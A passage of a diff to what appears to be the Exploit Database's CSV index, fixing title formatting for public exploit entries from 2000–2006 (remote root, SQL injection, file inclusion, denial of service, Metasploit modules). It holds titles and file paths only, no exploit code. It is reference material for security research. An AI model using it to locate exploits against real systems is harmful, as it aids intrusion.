Server 3.1b - Linux Remote Root Format String Exploit",2005-05-05,cybertronic,linux,remote,25 982,platforms/php/webapps/982.c,"ZeroBoard Worm Source Code",2005-05-06,N/A,php,webapps,0 983,platforms/windows/dos/983.cpp,"DataTrac Activity Console Denial of Service Exploit",2005-05-06,basher13,windows,dos,0 984,platforms/multiple/dos/984.c,"Ethereal <= 0.10.10 (dissect_ipc_state) Remote Denial of Service Exploit",2005-05-07,Nicob,multiple,dos,0 @@ -855,7 +855,7 @@ id,file,description,date,author,platform,type,port 1043,platforms/osx/local/1043.c,"Mac OS X 10.4 launchd Race Condition Exploit",2005-06-14,intropy,osx,local,0 1044,platforms/aix/local/1044.c,"AIX 5.2 - netpmon Local Elevated Privileges Exploit",2005-06-14,intropy,aix,local,0 1045,platforms/aix/local/1045.c,"AIX 5.2 - ipl_varyon Local Elevated Privileges Exploit",2005-06-14,intropy,aix,local,0 -1046,platforms/aix/local/1046.c,"AIX 5.2 paginit Local Root Exploit",2005-06-14,intropy,aix,local,0 +1046,platforms/aix/local/1046.c,"AIX 5.2 - paginit Local Root Exploit",2005-06-14,intropy,aix,local,0 1047,platforms/linux/remote/1047.pl,"ViRobot Advanced Server 2.0 (addschup) Remote Cookie Exploit",2005-06-14,"Kevin Finisterre",linux,remote,8080 1048,platforms/cgi/webapps/1048.pl,"eXtropia Shopping Cart web_store.cgi Remote Exploit",2005-06-15,"Action Spider",cgi,webapps,0 1049,platforms/php/webapps/1049.php,"Mambo 4.5.2.1 Fetch Password Hash Remote Exploit",2005-06-15,pokleyzz,php,webapps,0 @@ -881,7 +881,7 @@ id,file,description,date,author,platform,type,port 1070,platforms/asp/webapps/1070.pl,"ASPNuke <= 0.80 (article.asp) SQL Injection Exploit",2005-06-27,mh_p0rtal,asp,webapps,0 1071,platforms/asp/webapps/1071.pl,"ASPNuke <= 0.80 (comment_post.asp) SQL Injection Exploit",2005-06-27,"Alberto Trivero",asp,webapps,0 1072,platforms/multiple/dos/1072.cpp,"Stream / Raped - Denial of Service Attack (Windows)",2005-06-27,"Marco Del Percio",multiple,dos,0 -1073,platforms/solaris/local/1073.c,"Solaris 9 / 10 ld.so Local Root Exploit (1)",2005-06-28,"Przemyslaw Frasunek",solaris,local,0 +1073,platforms/solaris/local/1073.c,"Solaris 9 / 10 - ld.so Local Root Exploit (1)",2005-06-28,"Przemyslaw Frasunek",solaris,local,0 1074,platforms/solaris/local/1074.c,"Solaris 9 / 10 - ld.so Local Root Exploit (2)",2005-06-28,"Przemyslaw Frasunek",solaris,local,0 1075,platforms/windows/remote/1075.c,"Microsoft Windows Message Queuing BoF Universal Exploit (MS05-017) (v.0.3)",2005-06-29,houseofdabus,windows,remote,2103 1076,platforms/php/webapps/1076.py,"phpBB 2.0.15 (highlight) Remote PHP Code Execution",2005-06-29,rattle,php,webapps,0 @@ -920,7 +920,7 @@ id,file,description,date,author,platform,type,port 1110,platforms/windows/dos/1110.txt,"Microsoft Internet Explorer / MSN ICC Profiles Crash PoC Exploit",2005-07-15,"Edward Gagnon",windows,dos,0 1111,platforms/php/webapps/1111.pl,"Open Bulletin Board <= 1.0.5 - SQL Injection Exploit",2005-07-18,RusH,php,webapps,0 1112,platforms/asp/webapps/1112.txt,"Hosting Controller <= 6.1 HotFix 2.2 Add Domain without Quota Exploit",2005-07-18,"Soroush Dalili",asp,webapps,0 -1113,platforms/php/webapps/1113.pm,"phpBB 2.0.15 - Remote PHP Code Execution Exploit (Metasploit",2005-07-19,str0ke,php,webapps,0 +1113,platforms/php/webapps/1113.pm,"phpBB 2.0.15 - Remote PHP Code Execution Exploit (Metasploit)",2005-07-19,str0ke,php,webapps,0 1114,platforms/multiple/remote/1114.c,"HP OpenView OmniBack II Generic Remote Exploit",2000-12-21,DiGiT,multiple,remote,5555 1115,platforms/windows/remote/1115.pl,"Intruder Client 1.00 - Remote Command Execution & DoS Exploit",2005-07-21,basher13,windows,remote,0 1116,platforms/windows/dos/1116.c,"Microsoft Windows - Color Management Module Overflow Exploit (MS05-036)",2005-07-21,snooq,windows,dos,0 @@ -937,7 +937,7 @@ id,file,description,date,author,platform,type,port 1130,platforms/windows/remote/1130.c,"CA BrightStor ARCserve Backup Agent (dbasqlr.exe) Remote Exploit",2005-08-03,cybertronic,windows,remote,6070 1131,platforms/windows/remote/1131.c,"CA BrightStor ARCserve Backup (dsconfig.exe) Buffer Overflow",2005-08-03,cybertronic,windows,remote,41523 1132,platforms/windows/remote/1132.c,"CA BrightStor ARCserve Backup Auto Scanner / Exploiter",2005-08-03,cybertronic,windows,remote,6070 -1133,platforms/php/webapps/1133.pm,"vBulletin <= 3.0.6 (Template) Command Execution Exploit (Metasploit",2005-08-03,str0ke,php,webapps,0 +1133,platforms/php/webapps/1133.pm,"vBulletin <= 3.0.6 (Template) Command Execution Exploit (Metasploit)",2005-08-03,str0ke,php,webapps,0 1134,platforms/php/webapps/1134.pl,"MySQL Eventum <= 1.5.5 (login.php) SQL Injection Exploit",2005-08-05,"James Bercegay",php,webapps,0 1135,platforms/php/webapps/1135.c,"PHP-Fusion <= 6.0 106 BBCode IMG Tag Script Injection Exploit",2005-08-05,Easyex,php,webapps,0 1137,platforms/windows/dos/1137.pl,"Acunetix HTTP Sniffer Denial of Service Exploit",2005-08-05,basher13,windows,dos,0 @@ -945,9 +945,9 @@ id,file,description,date,author,platform,type,port 1139,platforms/linux/remote/1139.c,"Ethereal 10.x AFP Protocol Dissector Remote Format String Exploit",2005-08-06,vade79,linux,remote,0 1140,platforms/php/webapps/1140.php,"Flatnuke <= 2.5.5 - Remote Code Execution",2005-08-08,rgod,php,webapps,0 1142,platforms/php/webapps/1142.php,"WordPress <= 1.5.1.3 - Remote Code Execution (0Day)",2005-08-09,Kartoffelguru,php,webapps,0 -1143,platforms/windows/dos/1143.sys,"Microsoft Windows XP SP2 (rdpwd.sys) Remote Kernel DoS Exploit",2005-08-09,"Tom Ferris",windows,dos,0 +1143,platforms/windows/dos/1143.sys,"Microsoft Windows XP SP2 - (rdpwd.sys) Remote Kernel DoS Exploit",2005-08-09,"Tom Ferris",windows,dos,0 1144,platforms/windows/remote/1144.html,"Microsoft Internet Explorer (blnmgr.dll) COM Object Remote Exploit (MS05-038)",2005-08-09,FrSIRT,windows,remote,0 -1145,platforms/php/webapps/1145.pm,"WordPress <= 1.5.1.3 - Remote Code Execution eXploit (Metasploit",2005-08-10,str0ke,php,webapps,0 +1145,platforms/php/webapps/1145.pm,"WordPress <= 1.5.1.3 - Remote Code Execution exploit (Metasploit)",2005-08-10,str0ke,php,webapps,0 1146,platforms/windows/remote/1146.c,"Microsoft Windows Plug-and-Play Service Remote Overflow (MS05-039)",2005-08-11,sl0ppy,windows,remote,139 1147,platforms/windows/remote/1147.pm,"Veritas Backup Exec Remote File Access Exploit (windows)",2005-08-11,N/A,windows,remote,10000 1149,platforms/windows/remote/1149.c,"Microsoft Windows Plug-and-Play Service - Remote Universal Exploit (MS05-039)",2005-08-12,houseofdabus,windows,remote,445 @@ -967,9 +967,9 @@ id,file,description,date,author,platform,type,port 1164,platforms/windows/dos/1164.pl,"BusinessMail <= 4.60.00 - Remote Buffer Overflow Exploit",2005-07-30,"Reed Arvin",windows,dos,0 1165,platforms/windows/dos/1165.pl,"Inframail Advantage Server Edition 6.0 <= 6.37 - (SMTP) BoF Exploit",2005-06-27,"Reed Arvin",windows,dos,0 1166,platforms/windows/dos/1166.pl,"Inframail Advantage Server Edition 6.0 <= 6.37 - (FTP) BoF Exploit",2005-06-27,"Reed Arvin",windows,dos,0 -1167,platforms/solaris/remote/1167.pm,"Solaris <= 10 LPD Arbitrary File Delete Exploit (Metasploit",2005-08-19,Optyx,solaris,remote,0 +1167,platforms/solaris/remote/1167.pm,"Solaris <= 10 LPD Arbitrary File Delete Exploit (Metasploit)",2005-08-19,Optyx,solaris,remote,0 1168,platforms/windows/local/1168.c,"WinAce 2.6.0.5 Temporary File Parsing Buffer Overflow Vulnerability",2005-08-19,ATmaCA,windows,local,0 -1170,platforms/linux/local/1170.c,"Debian 2.2 /usr/bin/pileup Local Root Exploit",2001-07-13,"Charles Stevenson",linux,local,0 +1170,platforms/linux/local/1170.c,"Debian 2.2 - /usr/bin/pileup Local Root Exploit",2001-07-13,"Charles Stevenson",linux,local,0 1171,platforms/linux/remote/1171.c,"Elm < 2.5.8 (Expires Header) Remote Buffer Overflow Exploit",2005-08-22,c0ntex,linux,remote,0 1172,platforms/php/webapps/1172.pl,"MyBulletinBoard (MyBB) <= 1.00 RC4 SQL Injection Exploit",2005-08-22,Alpha_Programmer,php,webapps,0 1173,platforms/windows/local/1173.c,"Mercora IMRadio <= 4.0.0.0 - Local Password Disclosure Exploit",2005-08-22,Kozan,windows,local,0 @@ -980,7 +980,7 @@ id,file,description,date,author,platform,type,port 1179,platforms/windows/remote/1179.c,"Microsoft Windows Plug-and-Play Service Remote Universal Exploit (spanish fix)",2005-08-25,RoMaNSoFt,windows,remote,445 1180,platforms/windows/remote/1180.c,"Microsoft Windows Plug-and-Play Service Remote Universal Exploit (French Fix)",2005-08-25,"Fabrice Mourron",windows,remote,445 1181,platforms/linux/local/1181.c,"MySQL 4.0.17 - UDF Dynamic Library Exploit",2004-12-24,"Marco Ivaldi",linux,local,0 -1182,platforms/solaris/local/1182.c,"Solaris 2.6/7/8/9 (ld.so.1) Local Root Exploit (sparc)",2004-12-24,"Marco Ivaldi",solaris,local,0 +1182,platforms/solaris/local/1182.c,"Solaris 2.6/7/8/9 - (ld.so.1) Local Root Exploit (sparc)",2004-12-24,"Marco Ivaldi",solaris,local,0 1183,platforms/windows/remote/1183.c,"Battlefield (BFCC/BFVCC/BF2CC) - Login Bypass/Pass Stealer/DoS Exploit",2005-08-29,"Luigi Auriemma",windows,remote,0 1184,platforms/windows/remote/1184.c,"Savant Web Server 3.1 - Remote Buffer Overflow Exploit",2005-08-30,basher13,windows,remote,80 1185,platforms/osx/local/1185.pl,"Adobe Version Cue 1.0/1.0.1 - Local Root Exploit (OSX)",2005-08-30,vade79,osx,local,0 @@ -1009,7 +1009,7 @@ id,file,description,date,author,platform,type,port 1212,platforms/windows/dos/1212.pl,"COOL! Remote Control <= 1.12 - Remote Denial of Service Exploit",2005-09-11,basher13,windows,dos,0 1213,platforms/multiple/dos/1213.c,"Snort <= 2.4.0 SACK TCP Option Error Handling Denial of Service Exploit",2005-09-12,nitr0us,multiple,dos,0 1214,platforms/php/webapps/1214.php,"AzDGDatingLite <= 2.1.3 - Remote Code Execution Exploit",2005-09-13,rgod,php,webapps,0 -1215,platforms/linux/local/1215.c,"Wireless Tools 26 (iwconfig) Local Root Exploit (some setuid)",2005-09-14,Qnix,linux,local,0 +1215,platforms/linux/local/1215.c,"Wireless Tools 26 - (iwconfig) Local Root Exploit (some setuid)",2005-09-14,Qnix,linux,local,0 1217,platforms/php/webapps/1217.pl,"phpWebSite <= 0.10.0 (module) SQL Injection Exploit",2005-09-15,RusH,php,webapps,0 1218,platforms/windows/dos/1218.c,"Stoney FTPd Denial of Service Exploit (rxBot mods ftpd)",2005-09-16,D-oNe,windows,dos,0 1219,platforms/php/webapps/1219.c,"PHP-Nuke <= 7.8 (modules.php) SQL Injection Exploit",2005-09-16,RusH,php,webapps,0 @@ -1022,7 +1022,7 @@ id,file,description,date,author,platform,type,port 1226,platforms/php/webapps/1226.php,"phpMyFAQ <= 1.5.1 (User-Agent) Remote Shell Injection Exploit",2005-09-23,rgod,php,webapps,0 1227,platforms/php/webapps/1227.php,"MailGust <= 1.9 (board takeover) SQL Injection Exploit",2005-09-24,rgod,php,webapps,0 1229,platforms/linux/local/1229.sh,"Qpopper <= 4.0.8 - (poppassd) Local Root Exploit (Linux)",2005-09-24,kingcope,linux,local,0 -1230,platforms/bsd/local/1230.sh,"Qpopper <= 4.0.8 (poppassd) Local Root Exploit (freebsd)",2005-09-24,kingcope,bsd,local,0 +1230,platforms/bsd/local/1230.sh,"Qpopper <= 4.0.8 - (poppassd) Local Root Exploit (freebsd)",2005-09-24,kingcope,bsd,local,0 1231,platforms/linux/remote/1231.pl,"WzdFTPD <= 0.5.4 - Remote Command Execution Exploit",2005-09-24,kingcope,linux,remote,21 1232,platforms/linux/remote/1232.c,"RealPlayer/Helix Player Remote Format String Exploit (linux)",2005-09-26,c0ntex,linux,remote,0 1233,platforms/multiple/dos/1233.html,"Mozilla Firefox <= 1.0.7 - Integer Overflow Denial of Service Exploit",2005-09-26,"Georgi Guninski",multiple,dos,0 @@ -1040,7 +1040,7 @@ id,file,description,date,author,platform,type,port 1245,platforms/php/webapps/1245.php,"versatileBulletinBoard 1.00 RC2 (board takeover) SQL Injection Exploit",2005-10-10,rgod,php,webapps,0 1246,platforms/windows/dos/1246.pl,"RBExplorer 1.0 (Hijacking Command) Denial of Service Exploit",2005-10-11,basher13,windows,dos,0 1247,platforms/linux/remote/1247.pl,"phpBB 2.0.13 (admin_styles.php) Remote Command Execution Exploit",2005-10-11,RusH,linux,remote,0 -1248,platforms/solaris/local/1248.pl,"Solaris 10 DtPrintinfo/Session Local Root Exploit (x86)",2005-10-12,"Charles Stevenson",solaris,local,0 +1248,platforms/solaris/local/1248.pl,"Solaris 10 - DtPrintinfo/Session Local Root Exploit (x86)",2005-10-12,"Charles Stevenson",solaris,local,0 1250,platforms/php/webapps/1250.php,"w-Agora <= 4.2.0 (quicklist.php) Remote Code Execution Exploit",2005-10-14,rgod,php,webapps,0 1251,platforms/windows/dos/1251.pl,"TYPSoft FTP Server <= 1.11 (RETR) Denial of Service Vulnerability",2005-10-14,wood,windows,dos,0 1252,platforms/asp/webapps/1252.htm,"MuOnline Loopholes Web Server (pkok.asp) SQL Injection Exploit",2005-10-15,nukedx,asp,webapps,0 @@ -1058,7 +1058,7 @@ id,file,description,date,author,platform,type,port 1264,platforms/windows/remote/1264.pl,"Veritas NetBackup <= 6.0 (bpjava-msvc) Remote Exploit (Win32)",2005-10-20,"Kevin Finisterre",windows,remote,13722 1265,platforms/osx/remote/1265.pl,"Veritas NetBackup <= 6.0 (bpjava-msvc) Remote Exploit (OS X)",2005-10-20,"Kevin Finisterre",osx,remote,13722 1266,platforms/windows/dos/1266.py,"Ethereal 0.9.1 - 0.10.12 SLIMP3 - Remote Buffer Overflow PoC",2005-10-20,Sowhat,windows,dos,0 -1267,platforms/linux/local/1267.c,"XMail 1.21 (-t Command Line Option) Local Root Buffer Overflow Exploit",2005-10-20,qaaz,linux,local,0 +1267,platforms/linux/local/1267.c,"XMail 1.21 - (-t Command Line Option) Local Root Buffer Overflow Exploit",2005-10-20,qaaz,linux,local,0 1268,platforms/multiple/dos/1268.pl,"Net Portal Dynamic System <= 5.0 (register users) Denial of Service",2005-10-21,DarkFig,multiple,dos,0 1269,platforms/windows/dos/1269.c,"Microsoft Windows Plug-and-Play (Umpnpmgr.dll) DoS Exploit (MS05-047)",2005-10-21,N/A,windows,dos,0 1270,platforms/php/webapps/1270.php,"PHP-Nuke 7.8 - SQL Injection / Remote Command Execution Exploit",2005-10-23,rgod,php,webapps,0 @@ -1083,7 +1083,7 @@ id,file,description,date,author,platform,type,port 1290,platforms/linux/remote/1290.pl,"gpsdrive <= 2.09 (friendsd2) Remote Format String Exploit (ppc)",2005-11-04,"Kevin Finisterre",linux,remote,0 1291,platforms/linux/remote/1291.pl,"gpsdrive <= 2.09 (friendsd2) Remote Format String Exploit (x86)",2005-11-04,"Kevin Finisterre",linux,remote,0 1292,platforms/multiple/remote/1292.pm,"WzdFTPD <= 0.5.4 (SITE) Remote Command Execution Exploit (Metasploit)",2005-11-04,"David Maciejak",multiple,remote,21 -1295,platforms/linux/remote/1295.c,"linux-ftpd-ssl 0.17 (MKD/CWD) Remote Root Exploit",2005-11-05,kingcope,linux,remote,21 +1295,platforms/linux/remote/1295.c,"linux-ftpd-ssl 0.17 - (MKD/CWD) Remote Root Exploit",2005-11-05,kingcope,linux,remote,21 1296,platforms/php/webapps/1296.txt,"ibProArcade 2.x module (vBulletin/IPB) Remote SQL Injection Exploit",2005-11-06,B~HFH,php,webapps,0 1297,platforms/linux/local/1297.py,"F-Secure Internet Gatekeeper for Linux < 2.15.484 - Local Root Exploit",2005-11-07,"Xavier de Leon",linux,local,0 1298,platforms/php/webapps/1298.php,"ATutor 1.5.1pl2 SQL Injection / Command Execution Exploit",2005-11-07,rgod,php,webapps,0 @@ -1222,7 +1222,7 @@ id,file,description,date,author,platform,type,port 1474,platforms/linux/remote/1474.pm,"Mozilla Firefox 1.5 location.QueryInterface() Code Execution (linux)",2006-02-07,"H D Moore",linux,remote,0 1475,platforms/windows/dos/1475.html,"Microsoft Internet Explorer 7.0 Beta 2 - (urlmon.dll) Denial of Service Vuln",2006-02-07,"Tom Ferris",windows,dos,0 1478,platforms/php/webapps/1478.php,"CPGNuke Dragonfly 9.0.6.1 - Remote Commands Execution Exploit",2006-02-08,rgod,php,webapps,0 -1479,platforms/qnx/local/1479.sh,"QNX Neutrino 6.2.1 (phfont) Race Condition Local Root Exploit",2006-02-08,kokanin,qnx,local,0 +1479,platforms/qnx/local/1479.sh,"QNX Neutrino 6.2.1 - (phfont) Race Condition Local Root Exploit",2006-02-08,kokanin,qnx,local,0 1480,platforms/osx/remote/1480.pm,"Mozilla Firefox 1.5 - location.QueryInterface() Code Execution (osx)",2006-02-08,"H D Moore",osx,remote,0 1481,platforms/qnx/local/1481.sh,"QNX RTOS 6.3.0 Insecure rc.local Permissions Plus System Crash Exploit",2006-02-08,kokanin,qnx,local,0 1482,platforms/php/webapps/1482.php,"SPIP <= 1.8.2g Remote Commands Execution Exploit",2006-02-08,rgod,php,webapps,0 @@ -1281,12 +1281,12 @@ id,file,description,date,author,platform,type,port 1537,platforms/windows/remote/1537.pm,"Kerio Personal Firewall <= 2.1.4 - Remote Authentication Packet Overflow",2006-02-28,y0,windows,remote,44334 1538,platforms/php/webapps/1538.pl,"farsinews <= 2.5 - Directory Traversal arbitrary (users.db) access Exploit",2006-02-28,Hessam-x,php,webapps,0 1539,platforms/php/webapps/1539.txt,"MyBulletinBoard (MyBB) <= 1.03 (misc.php COMMA) SQL Injection",2006-02-28,Devil-00,php,webapps,0 -1540,platforms/bsd/dos/1540.pl,"FreeBSD 6.0 (nfsd) Remote Kernel Panic Denial of Service Exploit",2006-02-28,"Evgeny Legerov",bsd,dos,0 +1540,platforms/bsd/dos/1540.pl,"FreeBSD 6.0 - (nfsd) Remote Kernel Panic Denial of Service Exploit",2006-02-28,"Evgeny Legerov",bsd,dos,0 1541,platforms/php/webapps/1541.pl,"Limbo CMS <= 1.0.4.2 (ItemID) Remote Code Execution Exploit",2006-03-01,str0ke,php,webapps,0 1542,platforms/php/webapps/1542.pl,"phpRPC Library <= 0.7 XML Data Decoding Remote Code Execution",2006-03-01,LorD,php,webapps,0 1543,platforms/php/webapps/1543.pl,"vuBB <= 0.2 (Cookie) Final Remote SQL Injection Exploit (mq=off)",2006-03-01,KingOfSka,php,webapps,0 1544,platforms/php/webapps/1544.pl,"Woltlab Burning Board 2.x Datenbank MOD (fileid) Remote SQL Injection",2006-03-01,nukedx,php,webapps,0 -1545,platforms/osx/local/1545.pl,"Apple Mac OS X (/usr/bin/passwd) Custom Passwd Local Root Exploit",2006-03-01,vade79,osx,local,0 +1545,platforms/osx/local/1545.pl,"Apple Mac OS X - (/usr/bin/passwd) Custom Passwd Local Root Exploit",2006-03-01,vade79,osx,local,0 1546,platforms/php/webapps/1546.pl,"phpRPC Library <= 0.7 XML Data Decoding Remote Code Execution (2)",2006-03-02,cijfer,php,webapps,0 1547,platforms/php/webapps/1547.txt,"Aztek Forum 4.00 (XSS/SQL) Multiple Vulnerabilities (PoC)",2006-03-02,lorenzo,php,webapps,0 1548,platforms/php/webapps/1548.pl,"MyBulletinBoard (MyBB) <= 1.04 (misc.php COMMA) SQL Injection (2)",2006-03-03,Devil-00,php,webapps,0 @@ -1391,7 +1391,7 @@ id,file,description,date,author,platform,type,port 1656,platforms/php/webapps/1656.txt,"Sire 2.0 (lire.php) Remote File Inclusion/Arbitary File Upload Vulnerability",2006-04-09,simo64,php,webapps,0 1657,platforms/linux/dos/1657.asm,"Linux Kernel 2.6.x - sys_timer_create() Local Denial of Service Exploit",2006-04-09,fingerout,linux,dos,0 1659,platforms/php/webapps/1659.php,"PHPList <= 2.10.2 - GLOBALS[] Remote Code Execution Exploit",2006-04-10,rgod,php,webapps,0 -1660,platforms/php/webapps/1660.pm,"Horde <= 3.0.9/3.1.0 - (Help Viewer) Remote Code Execution (Metasploit",2006-04-10,Inkubus,php,webapps,0 +1660,platforms/php/webapps/1660.pm,"Horde <= 3.0.9/3.1.0 - (Help Viewer) Remote Code Execution (Metasploit)",2006-04-10,Inkubus,php,webapps,0 1661,platforms/php/webapps/1661.pl,"phpBB <= 2.0.19 (user_sig_bbcode_uid) Remote Code Execution Exploit",2006-04-10,RusH,php,webapps,0 1662,platforms/php/webapps/1662.php,"Clansys 1.1 (showid) - Remote SQL Injection Exploit",2006-04-10,snatcher,php,webapps,0 1663,platforms/php/webapps/1663.php,"Simplog <= 0.9.2 (s) Remote Commands Execution Exploit",2006-04-11,rgod,php,webapps,0 @@ -1722,7 +1722,7 @@ id,file,description,date,author,platform,type,port 2013,platforms/linux/local/2013.c,"Linux Kernel <= 2.6.17.4 - (proc) Local Root Exploit",2006-07-15,h00lyshit,linux,local,0 2014,platforms/windows/remote/2014.pl,"Winlpd 1.2 Build 1076 - Remote Buffer Overflow Exploit",2006-07-15,"Pablo Isola",windows,remote,515 2015,platforms/linux/local/2015.py,"Rocks Clusters <= 4.1 - (umount-loop) Local Root Exploit",2006-07-15,"Xavier de Leon",linux,local,0 -2016,platforms/linux/local/2016.sh,"Rocks Clusters <= 4.1 (mount-loop) Local Root Exploit",2006-07-15,"Xavier de Leon",linux,local,0 +2016,platforms/linux/local/2016.sh,"Rocks Clusters <= 4.1 - (mount-loop) Local Root Exploit",2006-07-15,"Xavier de Leon",linux,local,0 2017,platforms/multiple/remote/2017.pl,"Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure Exploit (Perl)",2006-07-15,UmZ,multiple,remote,10000 2018,platforms/php/webapps/2018.txt,"FlushCMS <= 1.0.0-pre2 (class.rich.php) Remote Inclusion Vulnerability",2006-07-16,igi,php,webapps,0 2019,platforms/php/webapps/2019.txt,"mail2forum phpBB Mod <= 1.2 (m2f_root_path) Remote Include Vulns",2006-07-17,OLiBekaS,php,webapps,0 @@ -1765,7 +1765,7 @@ id,file,description,date,author,platform,type,port 2064,platforms/php/webapps/2064.txt,"Mam-Moodle Mambo Component alpha Remote Inclusion Vulnerability",2006-07-23,jank0,php,webapps,0 2065,platforms/windows/local/2065.c,"Cheese Tracker <= 0.9.9 - Local Buffer Overflow Exploit PoC",2006-07-23,"Luigi Auriemma",windows,local,0 2066,platforms/php/webapps/2066.txt,"multibanners Mambo Component <= 1.0.1 - Remote Inclusion Vulnerability",2006-07-23,Blue|Spy,php,webapps,0 -2067,platforms/solaris/local/2067.c,"Solaris <= 10 sysinfo() Local Kernel Memory Disclosure Exploit",2006-07-24,prdelka,solaris,local,0 +2067,platforms/solaris/local/2067.c,"Solaris <= 10 - sysinfo() Local Kernel Memory Disclosure Exploit",2006-07-24,prdelka,solaris,local,0 2068,platforms/php/webapps/2068.php,"X7 Chat <= 2.0.4 (old_prefix) Remote Blind SQL Injection Exploit",2006-07-24,rgod,php,webapps,0 2069,platforms/php/webapps/2069.txt,"PrinceClan Chess Mambo Com <= 0.8 - Remote Inclusion Vulnerability",2006-07-24,OLiBekaS,php,webapps,0 2070,platforms/windows/remote/2070.pl,"SIPfoundry sipXtapi (CSeq) Remote Buffer Overflow Exploit",2006-07-24,"Jacopo Cervini",windows,remote,5060 @@ -1839,7 +1839,7 @@ id,file,description,date,author,platform,type,port 2141,platforms/php/webapps/2141.txt,"Visual Events Calendar 1.1 (cfg_dir) Remote Include Vulnerability",2006-08-07,"Mehmet Ince",php,webapps,0 2142,platforms/php/webapps/2142.txt,"ZoneX 1.0.3 Publishers Gold Edition Remote File Inclusion Vulnerability",2006-08-07,"Mehmet Ince",php,webapps,0 2143,platforms/php/webapps/2143.pl,"TWiki <= 4.0.4 (configure) Remote Command Execution Exploit",2006-08-07,"Javier Olascoaga",php,webapps,0 -2144,platforms/linux/local/2144.sh,"liblesstif <= 2-0.93.94-4mdk (DEBUG_FILE) Local Root Exploit",2006-08-08,"Karol Wiesek",linux,local,0 +2144,platforms/linux/local/2144.sh,"liblesstif <= 2-0.93.94-4mdk - (DEBUG_FILE) Local Root Exploit",2006-08-08,"Karol Wiesek",linux,local,0 2145,platforms/hardware/remote/2145.txt,"Barracuda Spam Firewall <= 3.3.03.053 - Remote Code Execution (extra)",2006-08-08,PATz,hardware,remote,0 2146,platforms/php/webapps/2146.txt,"docpile:we <= 0.2.2 (INIT_PATH) Remote File Inclusion Vulnerabilities",2006-08-08,"Mehmet Ince",php,webapps,0 2147,platforms/windows/dos/2147.pl,"XChat <= 2.6.7 - (Windows) Remote Denial of Service Exploit (Perl)",2006-08-08,Elo,windows,dos,0 @@ -2156,7 +2156,7 @@ id,file,description,date,author,platform,type,port 2460,platforms/windows/remote/2460.c,"Microsoft Internet Explorer WebViewFolderIcon setSlice() Exploit (c)",2006-09-29,LukeHack,windows,remote,0 2461,platforms/php/webapps/2461.txt,"VAMP Webmail <= 2.0beta1 (yesno.phtml) Remote Include Vulnerability",2006-09-30,Drago84,php,webapps,0 2462,platforms/php/webapps/2462.txt,"phpMyWebmin <= 1.0 - (target) Remote File Include Vulnerabilities",2006-09-30,"Mehmet Ince",php,webapps,0 -2463,platforms/osx/local/2463.c,"Mac OS X <= 10.4.7 Mach Exception Handling Local Root Exploit",2006-09-30,xmath,osx,local,0 +2463,platforms/osx/local/2463.c,"Mac OS X <= 10.4.7 - Mach Exception Handling Local Root Exploit",2006-09-30,xmath,osx,local,0 2464,platforms/osx/local/2464.pl,"Mac OS X <= 10.4.7 - Mach Exception Handling Local Exploit (10.3.x 0day)",2006-09-30,"Kevin Finisterre",osx,local,0 2465,platforms/php/webapps/2465.php,"BasiliX 1.1.1 (BSX_LIBDIR) Remote File Include Exploit",2006-10-01,Kacper,php,webapps,0 2466,platforms/linux/local/2466.pl,"cPanel <= 10.8.x - (cpwrap via mysqladmin) Local Root Exploit",2006-10-01,"Clint Torrez",linux,local,0 @@ -2273,7 +2273,7 @@ id,file,description,date,author,platform,type,port 2577,platforms/php/webapps/2577.txt,"P-News <= 1.16 - Remote File Include Vulnerability",2006-10-16,vegas78,php,webapps,0 2578,platforms/php/webapps/2578.txt,"phpMyManga <= 0.8.1 (template.php) Multiple File Include Vulnerabilities",2006-10-16,nuffsaid,php,webapps,0 2579,platforms/php/webapps/2579.pl,"WoltLab Burning Book <= 1.1.2 - Remote SQL Injection Exploit PoC",2006-10-16,ShAnKaR,php,webapps,0 -2580,platforms/osx/local/2580.pl,"Xcode OpenBase <= 9.1.5 (root file create) Local Root Exploit (OSX)",2006-10-16,"Kevin Finisterre",osx,local,0 +2580,platforms/osx/local/2580.pl,"Xcode OpenBase <= 9.1.5 - (root file create) Local Root Exploit (OSX)",2006-10-16,"Kevin Finisterre",osx,local,0 2581,platforms/linux/local/2581.c,"NVIDIA Graphics Driver <= 8774 - Local Buffer Overflow Exploit",2006-10-16,"Rapid7 Security",linux,local,0 2582,platforms/php/webapps/2582.txt,"ALiCE-CMS 0.1 - (CONFIG[local_root]) Remote File Include Vulnerability",2006-10-17,nuffsaid,php,webapps,0 2583,platforms/php/webapps/2583.php,"WSN Forum <= 1.3.4 (prestart.php) Remote Code Execution Exploit",2006-10-17,Kacper,php,webapps,0 @@ -2323,13 +2323,13 @@ id,file,description,date,author,platform,type,port 2630,platforms/php/webapps/2630.txt,"InteliEditor 1.2.x (lib.editor.inc.php) Remote File Include Vulnerability",2006-10-24,"Mehmet Ince",php,webapps,0 2631,platforms/php/webapps/2631.php,"Ascended Guestbook <= 1.0.0 - (embedded.php) File Include Exploit",2006-10-24,Kacper,php,webapps,0 2632,platforms/php/webapps/2632.pl,"CMS Faethon <= 2.0 (mainpath) Remote File Include Exploit",2006-10-24,r0ut3r,php,webapps,0 -2633,platforms/hp-ux/local/2633.c,"HP-UX 11i (swpackage) Stack Overflow Local Root Exploit",2006-10-24,prdelka,hp-ux,local,0 -2634,platforms/hp-ux/local/2634.c,"HP-UX 11i (swmodify) Stack Overflow Local Root Exploit",2006-10-24,prdelka,hp-ux,local,0 -2635,platforms/hp-ux/local/2635.c,"HP-UX 11i (swask) Format String Local Root Exploit",2006-10-24,prdelka,hp-ux,local,0 -2636,platforms/hp-ux/local/2636.c,"HP-UX 11i (LIBC TZ enviroment variable) Local Root Exploit",2006-10-24,prdelka,hp-ux,local,0 +2633,platforms/hp-ux/local/2633.c,"HP-UX 11i - (swpackage) Stack Overflow Local Root Exploit",2006-10-24,prdelka,hp-ux,local,0 +2634,platforms/hp-ux/local/2634.c,"HP-UX 11i - (swmodify) Stack Overflow Local Root Exploit",2006-10-24,prdelka,hp-ux,local,0 +2635,platforms/hp-ux/local/2635.c,"HP-UX 11i - (swask) Format String Local Root Exploit",2006-10-24,prdelka,hp-ux,local,0 +2636,platforms/hp-ux/local/2636.c,"HP-UX 11i - (LIBC TZ enviroment variable) Local Root Exploit",2006-10-24,prdelka,hp-ux,local,0 2637,platforms/windows/remote/2637.c,"AEP SmartGate 4.3b (GET) Arbitrary File Download Exploit",2006-10-24,prdelka,windows,remote,143 2638,platforms/hardware/remote/2638.c,"Cisco VPN 3000 Concentrator <= 4.1.7 / 4.7.2 - (FTP) Remote Exploit",2006-10-24,prdelka,hardware,remote,0 -2639,platforms/bsd/dos/2639.c,"FreeBSD 6.1 